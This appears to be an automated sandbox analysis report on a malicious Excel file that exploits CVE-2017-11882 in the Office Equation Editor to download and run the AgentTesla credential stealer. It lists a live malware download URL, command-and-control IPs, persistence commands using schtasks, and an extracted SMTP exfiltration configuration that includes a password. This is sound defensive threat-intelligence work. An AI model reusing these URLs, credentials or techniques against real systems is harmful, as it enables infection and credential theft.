Loading ...

Play interactive tourEdit tour

Windows Analysis Report Doc2.xlsx

Overview

General Information

Sample Name:Doc2.xlsx
Analysis ID:452692
MD5:7848697a2cff990710c69e8d97e55c13
SHA1:9af272f7dedd808c48b03d98d7eb75356b74f6ee
SHA256:ef17f47bcdb067d712661ddadff8ebee2924282c7fe21edd237e8094cc4ebdb0
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large strings
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2392 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2264 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2964 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
      • schtasks.exe (PID: 2172 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 2148 cmdline: {path} MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
  • MLdAu.exe (PID: 1796 cmdline: 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe' MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
    • schtasks.exe (PID: 1984 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • MLdAu.exe (PID: 2052 cmdline: {path} MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
  • MLdAu.exe (PID: 3036 cmdline: 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe' MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
    • schtasks.exe (PID: 1440 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • MLdAu.exe (PID: 1068 cmdline: {path} MD5: 6733D5E8934EAFF7C0087E7DE2C8E62A)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "account@jiqdyi.com", "Password": "Emotion22", "Host": "mail.spamora.net"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.MLdAu.exe.328e310.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              12.2.MLdAu.exe.328e310.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                11.2.MLdAu.exe.30ee310.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.MLdAu.exe.30ee310.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    6.2.vbc.exe.340e310.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.26.106.165, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2264, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2264, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2264, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2964
                      Sigma detected: Execution from Suspicious FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2264, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2964

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://arkemagrup.com/Doc_87654334567.exeAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 11.2.MLdAu.exe.30ee310.3.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "account@jiqdyi.com", "Password": "Emotion22", "Host": "mail.spamora.net"}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exeReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exeReversingLabs: Detection: 13%
                      Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 13%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Doc2.xlsxReversingLabs: Detection: 28%

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp
                      Source: global trafficDNS query: name: arkemagrup.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.26.106.165:80
                      Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
                      Source: Joe Sandbox ViewIP Address: 185.26.106.194 185.26.106.194
                      Source: Joe Sandbox ViewIP Address: 185.26.106.165 185.26.106.165
                      Source: Joe Sandbox ViewASN Name: ATE-ASFR ATE-ASFR
                      Source: Joe Sandbox ViewASN Name: ATE-ASFR ATE-ASFR
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.26.106.194:587
                      Source: global trafficHTTP traffic detected: GET /Doc_87654334567.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: arkemagrup.comConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38D6D8CE.emfJump to behavior
                      Source: global trafficHTTP traffic detected: GET /Doc_87654334567.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: arkemagrup.comConnection: Keep-Alive
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: arkemagrup.com
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: http://BGwprh.com
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: vbc.exe, 00000009.00000002.2370164417.00000000008CD000.00000004.00000020.sdmp, vbc.exe, 00000009.00000003.2293255125.0000000006170000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://mail.spamora.net
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: vbc.exe, 00000009.00000002.2370250103.000000000093D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0%
                      Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: vbc.exe, 00000009.00000002.2382948268.0000000008610000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: vbc.exe, 00000006.00000002.2235845813.000000000B8F0000.00000002.00000001.sdmp, vbc.exe, 00000009.00000002.2375831529.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://login.blockchain.com/HD?m
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://login.blockchain.com/ObjectLengthChainingModeGCMAuthTagLengthChainingModeKeyDataBlobAESMicro
                      Source: vbc.exe, 00000009.00000002.2370750272.00000000023D5000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: vbc.exe, 00000009.00000002.2376444865.00000000060C0000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: vbc.exe, 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large stringsShow sources
                      Source: vbc.exe.4.dr, Utilities/UI.Controls/Design/YaTabControlDesigner.csLong String: Length: 32771
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00318C206_2_00318C20
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003110686_2_00311068
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003178A96_2_003178A9
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031D4886_2_0031D488
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031AD506_2_0031AD50
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003171E86_2_003171E8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00319DE86_2_00319DE8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003193916_2_00319391
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031BC186_2_0031BC18
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031BC086_2_0031BC08
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031AC5F6_2_0031AC5F
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031D0406_2_0031D040
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003180886_2_00318088
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031CDE86_2_0031CDE8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031EE286_2_0031EE28
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031EE186_2_0031EE18
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031F2B16_2_0031F2B1
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031D2A06_2_0031D2A0
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031F2C06_2_0031F2C0
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031DFB46_2_0031DFB4
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031C7906_2_0031C790
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00318B806_2_00318B80
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_0031FB886_2_0031FB88
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B21686_2_003B2168
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B17586_2_003B1758
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B06386_2_003B0638
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B1A086_2_003B1A08
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B00486_2_003B0048
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B00406_2_003B0040
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B21596_2_003B2159
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B25586_2_003B2558
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B17496_2_003B1749
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B25496_2_003B2549
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B37A96_2_003B37A9
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B35A06_2_003B35A0
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B05F96_2_003B05F9
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B19F86_2_003B19F8
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_003B31F46_2_003B31F4
                      Source: C:\Users\Public\vbc.exeCode function: 9_2_003259289_2_00325928
                      Source: C:\Users\Public\vbc.exeCode function: 9_2_00325C709_2_00325C70
                      Source: C:\Users\Public\vbc.exeCode function: 9_2_003265409_2_00326540
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8C2011_2_002E8C20
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E78A911_2_002E78A9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E00B011_2_002E00B0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ED48811_2_002ED488
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E71E811_2_002E71E8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E9DE811_2_002E9DE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EB36111_2_002EB361
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E939111_2_002E9391
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EBC0811_2_002EBC08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8C1B11_2_002E8C1B
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EBC1811_2_002EBC18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ED04011_2_002ED040
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E808811_2_002E8088
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E08E811_2_002E08E8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EE4CC11_2_002EE4CC
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ECDE811_2_002ECDE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EEE2811_2_002EEE28
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EEE1811_2_002EEE18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002ED2A011_2_002ED2A0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EF2B111_2_002EF2B1
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EF2C011_2_002EF2C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002EC79011_2_002EC790
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D2175811_2_01D21758
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D220E011_2_01D220E0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D22E3811_2_01D22E38
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D219F811_2_01D219F8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D205F911_2_01D205F9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D22B5111_2_01D22B51
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D2351811_2_01D23518
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D2372111_2_01D23721
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D224D011_2_01D224D0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D224C011_2_01D224C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D2004811_2_01D20048
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D21A0811_2_01D21A08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_01D2063811_2_01D20638
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D2E3812_2_001D2E38
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D589212_2_001D5892
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D20E012_2_001D20E0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D175812_2_001D1758
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D1A0812_2_001D1A08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D000612_2_001D0006
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D063812_2_001D0638
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D004812_2_001D0048
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D20D112_2_001D20D1
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D24D012_2_001D24D0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D24C012_2_001D24C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D351812_2_001D3518
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D372112_2_001D3721
